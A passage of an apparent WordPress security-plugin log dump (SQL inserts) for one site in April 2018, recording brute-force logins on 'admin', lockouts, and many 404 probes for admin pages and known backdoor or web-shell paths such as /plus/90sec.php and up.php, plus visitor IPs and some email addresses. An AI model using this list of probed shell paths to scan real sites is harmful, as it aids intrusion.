(84928, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 00:38:36', '2018-04-20 05:38:36', '93.115.95.204', 'admin', 0, '', '', 'a:0:{}'),
(84929, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 00:38:36', '2018-04-20 05:38:36', '93.115.95.204', 'admin', 0, '', '', 'a:0:{}'),
(84930, 'lockout', 'Host or User Lockout', 10, '2018-04-20 00:38:36', '2018-04-20 05:38:36', '93.115.95.204', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-20 00:53:36";s:11:"expires_gmt";s:19:"2018-04-20 05:53:36";s:4:"type";s:11:"brute_force";}'),
(84931, 'four_oh_four', '404 Error', 3, '2018-04-20 01:19:17', '2018-04-20 06:19:17', '195.154.28.149', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84932, 'four_oh_four', '404 Error', 3, '2018-04-20 01:19:51', '2018-04-20 06:19:51', '101.81.231.39', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84933, 'four_oh_four', '404 Error', 3, '2018-04-20 02:09:58', '2018-04-20 07:09:58', '188.138.105.83', '', 0, '/wp-content/plugins/wp-ps.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84934, 'four_oh_four', '404 Error', 3, '2018-04-20 02:22:00', '2018-04-20 07:22:00', '216.244.66.195', '', 0, '/category/clear-your-beliefs/page/71/russiaslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84935, 'four_oh_four', '404 Error', 3, '2018-04-20 03:41:46', '2018-04-20 08:41:46', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84936, 'four_oh_four', '404 Error', 3, '2018-04-20 03:41:46', '2018-04-20 08:41:46', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84937, 'four_oh_four', '404 Error', 3, '2018-04-20 03:58:01', '2018-04-20 08:58:01', '95.7.180.227', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84938, 'four_oh_four', '404 Error', 3, '2018-04-20 03:58:03', '2018-04-20 08:58:03', '95.7.180.227', '', 0, '/admin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84939, 'four_oh_four', '404 Error', 3, '2018-04-20 03:58:05', '2018-04-20 08:58:05', '95.7.180.227', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(84940, 'four_oh_four', '404 Error', 3, '2018-04-20 03:58:06', '2018-04-20 08:58:06', '95.7.180.227', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84941, 'four_oh_four', '404 Error', 3, '2018-04-20 03:58:09', '2018-04-20 08:58:09', '95.7.180.227', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84942, 'four_oh_four', '404 Error', 3, '2018-04-20 03:58:10', '2018-04-20 08:58:10', '95.7.180.227', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84943, 'four_oh_four', '404 Error', 3, '2018-04-20 04:28:11', '2018-04-20 09:28:11', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84944, 'four_oh_four', '404 Error', 3, '2018-04-20 04:28:11', '2018-04-20 09:28:11', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84945, 'four_oh_four', '404 Error', 3, '2018-04-20 04:28:14', '2018-04-20 09:28:14', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84946, 'four_oh_four', '404 Error', 3, '2018-04-20 04:28:14', '2018-04-20 09:28:14', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84947, 'four_oh_four', '404 Error', 3, '2018-04-20 05:17:10', '2018-04-20 10:17:10', '176.144.202.111', '', 0, '/wp-content/uploads/2014/03/CYB-1.mp3', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84948, 'four_oh_four', '404 Error', 3, '2018-04-20 05:17:47', '2018-04-20 10:17:47', '176.144.202.111', '', 0, '/wp-content/uploads%20.mp3', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84949, 'backup', 'Database Backup Executed', 3, '2018-04-20 05:21:56', '2018-04-20 10:21:56', '', '', 0, '', '', 'a:1:{i:0;a:2:{s:6:"status";s:7:"Success";s:7:"details";s:46:"emailed to backup recipients and saved locally";}}'),
(84950, 'four_oh_four', '404 Error', 3, '2018-04-20 05:32:49', '2018-04-20 10:32:49', '45.117.156.10', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(84951, 'four_oh_four', '404 Error', 3, '2018-04-20 06:15:10', '2018-04-20 11:15:10', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84952, 'four_oh_four', '404 Error', 3, '2018-04-20 06:31:02', '2018-04-20 11:31:02', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84953, 'four_oh_four', '404 Error', 3, '2018-04-20 06:37:19', '2018-04-20 11:37:19', '37.218.183.8', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84954, 'four_oh_four', '404 Error', 3, '2018-04-20 07:05:18', '2018-04-20 12:05:18', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84955, 'four_oh_four', '404 Error', 3, '2018-04-20 07:05:21', '2018-04-20 12:05:21', '198.204.231.75', '', 0, '/trackback/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(84956, 'four_oh_four', '404 Error', 3, '2018-04-20 07:17:31', '2018-04-20 12:17:31', '85.64.66.16', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84957, 'four_oh_four', '404 Error', 3, '2018-04-20 07:35:42', '2018-04-20 12:35:42', '46.209.137.27', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(84958, 'four_oh_four', '404 Error', 3, '2018-04-20 07:46:55', '2018-04-20 12:46:55', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84959, 'four_oh_four', '404 Error', 3, '2018-04-20 07:53:14', '2018-04-20 12:53:14', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84960, 'four_oh_four', '404 Error', 3, '2018-04-20 07:55:03', '2018-04-20 12:55:03', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84961, 'four_oh_four', '404 Error', 3, '2018-04-20 08:05:11', '2018-04-20 13:05:11', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84962, 'four_oh_four', '404 Error', 3, '2018-04-20 08:11:29', '2018-04-20 13:11:29', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84963, 'four_oh_four', '404 Error', 3, '2018-04-20 08:49:55', '2018-04-20 13:49:55', '180.76.139.176', '', 0, '/plus/90sec.php', 'http://www.clearyourbeliefs.com/plus/90sec.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84964, 'four_oh_four', '404 Error', 3, '2018-04-20 08:49:56', '2018-04-20 13:49:56', '180.76.139.176', '', 0, '/plus/spider.php', 'http://www.clearyourbeliefs.com/plus/spider.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84965, 'four_oh_four', '404 Error', 3, '2018-04-20 08:49:57', '2018-04-20 13:49:57', '180.76.139.176', '', 0, '/plus/e7xue.php', 'http://www.clearyourbeliefs.com/plus/e7xue.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84966, 'four_oh_four', '404 Error', 3, '2018-04-20 08:49:58', '2018-04-20 13:49:58', '180.76.139.176', '', 0, '/plus/mycak.php', 'http://www.clearyourbeliefs.com/plus/mycak.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84967, 'four_oh_four', '404 Error', 3, '2018-04-20 08:49:59', '2018-04-20 13:49:59', '180.76.139.176', '', 0, '/sitemap/templates/met/SqlIn.asp', 'http://www.clearyourbeliefs.com/sitemap/templates/met/SqlIn.asp', 'a:1:{s:12:"query_string";s:0:"";}'),
(84968, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:01', '2018-04-20 13:50:01', '180.76.139.176', '', 0, '/plus/mybak.php', 'http://www.clearyourbeliefs.com/plus/mybak.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84969, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:02', '2018-04-20 13:50:02', '180.76.139.176', '', 0, '/plus/x.php', 'http://www.clearyourbeliefs.com/plus/x.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84970, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:03', '2018-04-20 13:50:03', '180.76.139.176', '', 0, '/plus/service.php', 'http://www.clearyourbeliefs.com/plus/service.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84971, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:04', '2018-04-20 13:50:04', '180.76.139.176', '', 0, '/plus/av.php', 'http://www.clearyourbeliefs.com/plus/av.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84972, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:05', '2018-04-20 13:50:05', '180.76.139.176', '', 0, '/plus/mytag_js.php', 'http://www.clearyourbeliefs.com/plus/mytag_js.php?aid=511348', 'a:1:{s:12:"query_string";s:10:"aid=511348";}');
INSERT INTO `cyb_itsec_log` (`log_id`, `log_type`, `log_function`, `log_priority`, `log_date`, `log_date_gmt`, `log_host`, `log_username`, `log_user`, `log_url`, `log_referrer`, `log_data`) VALUES
(84973, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:06', '2018-04-20 13:50:06', '180.76.139.176', '', 0, '/plus/mytag_js.php', 'http://www.clearyourbeliefs.com/plus/mytag_js.php?aid=511348', 'a:1:{s:12:"query_string";s:10:"aid=511348";}'),
(84974, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:07', '2018-04-20 13:50:07', '180.76.139.176', '', 0, '/plus/mytag_js.php', 'http://www.clearyourbeliefs.com/plus/mytag_js.php?aid=511348', 'a:1:{s:12:"query_string";s:10:"aid=511348";}'),
(84975, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:08', '2018-04-20 13:50:08', '180.76.139.176', '', 0, '/lang/cn/system.php', 'http://www.clearyourbeliefs.com/lang/cn/system.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84976, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:09', '2018-04-20 13:50:09', '180.76.139.176', '', 0, '/config/AspCms_Config.asp', 'http://www.clearyourbeliefs.com/config/AspCms_Config.asp', 'a:1:{s:12:"query_string";s:0:"";}'),
(84977, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:10', '2018-04-20 13:50:10', '180.76.139.176', '', 0, '/admin_login.php', 'http://www.clearyourbeliefs.com/admin_login.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84978, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:11', '2018-04-20 13:50:11', '180.76.139.176', '', 0, '/Templates/red.asp', 'http://www.clearyourbeliefs.com/Templates/red.asp', 'a:1:{s:12:"query_string";s:0:"";}'),
(84979, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:12', '2018-04-20 13:50:12', '180.76.139.176', '', 0, '/plus/mytag_js.php', 'http://www.clearyourbeliefs.com/plus/mytag_js.php?aid=8080', 'a:1:{s:12:"query_string";s:8:"aid=8080";}'),
(84980, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:13', '2018-04-20 13:50:13', '180.76.139.176', '', 0, '/plus/mytag_js.php', 'http://www.clearyourbeliefs.com/plus/mytag_js.php?aid=8080', 'a:1:{s:12:"query_string";s:8:"aid=8080";}'),
(84981, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:15', '2018-04-20 13:50:15', '180.76.139.176', '', 0, '/plus/mytag_js.php', 'http://www.clearyourbeliefs.com/plus/mytag_js.php?aid=8080', 'a:1:{s:12:"query_string";s:8:"aid=8080";}'),
(84982, 'four_oh_four', '404 Error', 3, '2018-04-20 08:50:16', '2018-04-20 13:50:16', '180.76.139.176', '', 0, '/images/swfupload/images/uploadye.php', 'http://www.clearyourbeliefs.com/images/swfupload/images/uploadye.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84983, 'lockout', 'Host or User Lockout', 10, '2018-04-20 08:50:16', '2018-04-20 13:50:16', '180.76.139.176', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-20 09:05:16";s:11:"expires_gmt";s:19:"2018-04-20 14:05:16";s:4:"type";s:12:"four_oh_four";}'),
(84984, 'four_oh_four', '404 Error', 3, '2018-04-20 09:09:56', '2018-04-20 14:09:56', '112.202.167.255', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84985, 'four_oh_four', '404 Error', 3, '2018-04-20 09:20:03', '2018-04-20 14:20:03', '151.237.185.206', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84986, 'four_oh_four', '404 Error', 3, '2018-04-20 09:20:04', '2018-04-20 14:20:04', '151.237.185.206', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84987, 'four_oh_four', '404 Error', 3, '2018-04-20 09:25:23', '2018-04-20 14:25:23', '119.160.100.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84988, 'four_oh_four', '404 Error', 3, '2018-04-20 09:30:08', '2018-04-20 14:30:08', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84989, 'four_oh_four', '404 Error', 3, '2018-04-20 09:54:00', '2018-04-20 14:54:00', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84990, 'four_oh_four', '404 Error', 3, '2018-04-20 10:12:22', '2018-04-20 15:12:22', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84991, 'four_oh_four', '404 Error', 3, '2018-04-20 10:19:46', '2018-04-20 15:19:46', '103.252.200.55', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84992, 'four_oh_four', '404 Error', 3, '2018-04-20 10:41:31', '2018-04-20 15:41:31', '66.249.69.99', '', 0, '/author/maria/page/64/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84993, 'four_oh_four', '404 Error', 3, '2018-04-20 10:53:44', '2018-04-20 15:53:44', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84994, 'four_oh_four', '404 Error', 3, '2018-04-20 11:01:18', '2018-04-20 16:01:18', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84995, 'four_oh_four', '404 Error', 3, '2018-04-20 11:02:42', '2018-04-20 16:02:42', '69.50.201.221', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84996, 'four_oh_four', '404 Error', 3, '2018-04-20 11:04:22', '2018-04-20 16:04:22', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84997, 'four_oh_four', '404 Error', 3, '2018-04-20 11:06:48', '2018-04-20 16:06:48', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84998, 'four_oh_four', '404 Error', 3, '2018-04-20 11:26:21', '2018-04-20 16:26:21', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84999, 'four_oh_four', '404 Error', 3, '2018-04-20 11:27:59', '2018-04-20 16:27:59', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85000, 'four_oh_four', '404 Error', 3, '2018-04-20 11:31:09', '2018-04-20 16:31:09', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85001, 'four_oh_four', '404 Error', 3, '2018-04-20 11:38:12', '2018-04-20 16:38:12', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85002, 'four_oh_four', '404 Error', 3, '2018-04-20 11:45:16', '2018-04-20 16:45:16', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85003, 'four_oh_four', '404 Error', 3, '2018-04-20 11:48:01', '2018-04-20 16:48:01', '195.154.28.149', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85004, 'four_oh_four', '404 Error', 3, '2018-04-20 11:48:02', '2018-04-20 16:48:02', '195.154.28.149', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85005, 'four_oh_four', '404 Error', 3, '2018-04-20 11:59:32', '2018-04-20 16:59:32', '105.154.19.222', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85006, 'four_oh_four', '404 Error', 3, '2018-04-20 12:02:47', '2018-04-20 17:02:47', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85007, 'four_oh_four', '404 Error', 3, '2018-04-20 12:02:47', '2018-04-20 17:02:47', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85008, 'four_oh_four', '404 Error', 3, '2018-04-20 12:02:50', '2018-04-20 17:02:50', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85009, 'four_oh_four', '404 Error', 3, '2018-04-20 12:02:51', '2018-04-20 17:02:51', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85010, 'four_oh_four', '404 Error', 3, '2018-04-20 12:03:39', '2018-04-20 17:03:39', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85011, 'four_oh_four', '404 Error', 3, '2018-04-20 12:14:38', '2018-04-20 17:14:38', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85012, 'four_oh_four', '404 Error', 3, '2018-04-20 12:18:11', '2018-04-20 17:18:11', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85013, 'four_oh_four', '404 Error', 3, '2018-04-20 12:34:16', '2018-04-20 17:34:16', '193.106.30.99', '', 0, '/get.php', '', 'a:1:{s:12:"query_string";s:51:"key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG";}'),
(85014, 'four_oh_four', '404 Error', 3, '2018-04-20 12:34:18', '2018-04-20 17:34:18', '91.200.12.193', '', 0, '/sites/default/files/up.php', 'http://clearyourbeliefs.org/sites/default/files/up.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(85015, 'four_oh_four', '404 Error', 3, '2018-04-20 12:34:19', '2018-04-20 17:34:19', '91.200.12.193', '', 0, '/sites/default/files/up.php', 'http://clearyourbeliefs.com/sites/default/files/up.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(85016, 'four_oh_four', '404 Error', 3, '2018-04-20 12:41:18', '2018-04-20 17:41:18', '157.55.39.81', '', 0, '/who-we-are/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85017, 'four_oh_four', '404 Error', 3, '2018-04-20 12:41:45', '2018-04-20 17:41:45', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85018, 'four_oh_four', '404 Error', 3, '2018-04-20 12:55:04', '2018-04-20 17:55:04', '41.225.3.122', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85019, 'four_oh_four', '404 Error', 3, '2018-04-20 13:08:32', '2018-04-20 18:08:32', '5.255.250.80', '', 0, '/blog/page/72/marcopoloslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85020, 'four_oh_four', '404 Error', 3, '2018-04-20 13:11:14', '2018-04-20 18:11:14', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85021, 'four_oh_four', '404 Error', 3, '2018-04-20 13:33:27', '2018-04-20 18:33:27', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85022, 'four_oh_four', '404 Error', 3, '2018-04-20 13:53:21', '2018-04-20 18:53:21', '31.223.156.230', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85023, 'four_oh_four', '404 Error', 3, '2018-04-20 14:09:29', '2018-04-20 19:09:29', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85024, 'four_oh_four', '404 Error', 3, '2018-04-20 14:53:22', '2018-04-20 19:53:22', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85025, 'four_oh_four', '404 Error', 3, '2018-04-20 14:53:22', '2018-04-20 19:53:22', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85026, 'four_oh_four', '404 Error', 3, '2018-04-20 14:53:25', '2018-04-20 19:53:25', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85027, 'four_oh_four', '404 Error', 3, '2018-04-20 14:53:26', '2018-04-20 19:53:26', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85028, 'four_oh_four', '404 Error', 3, '2018-04-20 15:35:10', '2018-04-20 20:35:10', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85029, 'four_oh_four', '404 Error', 3, '2018-04-20 15:36:55', '2018-04-20 20:36:55', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85030, 'four_oh_four', '404 Error', 3, '2018-04-20 15:40:58', '2018-04-20 20:40:58', '144.217.5.52', '', 0, '/author/geri/page/3/www.Vital-Ventures.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85031, 'four_oh_four', '404 Error', 3, '2018-04-20 15:41:09', '2018-04-20 20:41:09', '144.217.5.52', '', 0, '/author/maria/page/62/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85032, 'four_oh_four', '404 Error', 3, '2018-04-20 15:44:01', '2018-04-20 20:44:01', '144.217.5.52', '', 0, '/author/howard/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85033, 'four_oh_four', '404 Error', 3, '2018-04-20 15:45:20', '2018-04-20 20:45:20', '144.217.5.52', '', 0, '/author/geri/page/2/www.Vital-Ventures.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85034, 'four_oh_four', '404 Error', 3, '2018-04-20 15:48:31', '2018-04-20 20:48:31', '144.217.5.52', '', 0, '/who-we-are/www.breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85035, 'four_oh_four', '404 Error', 3, '2018-04-20 15:56:30', '2018-04-20 20:56:30', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85036, 'four_oh_four', '404 Error', 3, '2018-04-20 16:13:17', '2018-04-20 21:13:17', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85037, 'four_oh_four', '404 Error', 3, '2018-04-20 16:20:10', '2018-04-20 21:20:10', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85346, 'four_oh_four', '404 Error', 3, '2018-04-22 16:07:14', '2018-04-22 21:07:14', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85345, 'four_oh_four', '404 Error', 3, '2018-04-22 16:04:27', '2018-04-22 21:04:27', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85344, 'four_oh_four', '404 Error', 3, '2018-04-22 16:03:42', '2018-04-22 21:03:42', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85343, 'four_oh_four', '404 Error', 3, '2018-04-22 15:41:53', '2018-04-22 20:41:53', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85342, 'four_oh_four', '404 Error', 3, '2018-04-22 15:34:42', '2018-04-22 20:34:42', '219.131.84.78', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85341, 'four_oh_four', '404 Error', 3, '2018-04-22 15:34:41', '2018-04-22 20:34:41', '219.131.84.78', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85340, 'four_oh_four', '404 Error', 3, '2018-04-22 15:25:04', '2018-04-22 20:25:04', '191.102.150.28', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(85339, 'four_oh_four', '404 Error', 3, '2018-04-22 15:25:03', '2018-04-22 20:25:03', '66.249.69.102', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85338, 'four_oh_four', '404 Error', 3, '2018-04-22 15:24:59', '2018-04-22 20:24:59', '195.154.185.43', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(85336, 'four_oh_four', '404 Error', 3, '2018-04-22 15:22:53', '2018-04-22 20:22:53', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85337, 'four_oh_four', '404 Error', 3, '2018-04-22 15:23:49', '2018-04-22 20:23:49', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85335, 'four_oh_four', '404 Error', 3, '2018-04-22 15:09:14', '2018-04-22 20:09:14', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85334, 'four_oh_four', '404 Error', 3, '2018-04-22 14:59:11', '2018-04-22 19:59:11', '119.160.96.42', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85333, 'four_oh_four', '404 Error', 3, '2018-04-22 14:27:46', '2018-04-22 19:27:46', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85332, 'four_oh_four', '404 Error', 3, '2018-04-22 13:49:07', '2018-04-22 18:49:07', '193.106.30.99', '', 0, '/global-belief-relief/wp-content/themes/peekaboo/404.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85331, 'four_oh_four', '404 Error', 3, '2018-04-22 13:48:55', '2018-04-22 18:48:55', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85330, 'four_oh_four', '404 Error', 3, '2018-04-22 13:48:54', '2018-04-22 18:48:54', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85329, 'four_oh_four', '404 Error', 3, '2018-04-22 13:48:51', '2018-04-22 18:48:51', '47.220.187.63', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85328, 'four_oh_four', '404 Error', 3, '2018-04-22 13:48:50', '2018-04-22 18:48:50', '47.220.187.63', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85327, 'four_oh_four', '404 Error', 3, '2018-04-22 13:47:21', '2018-04-22 18:47:21', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85326, 'four_oh_four', '404 Error', 3, '2018-04-22 13:47:21', '2018-04-22 18:47:21', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85325, 'four_oh_four', '404 Error', 3, '2018-04-22 13:47:18', '2018-04-22 18:47:18', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85324, 'four_oh_four', '404 Error', 3, '2018-04-22 13:47:17', '2018-04-22 18:47:17', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
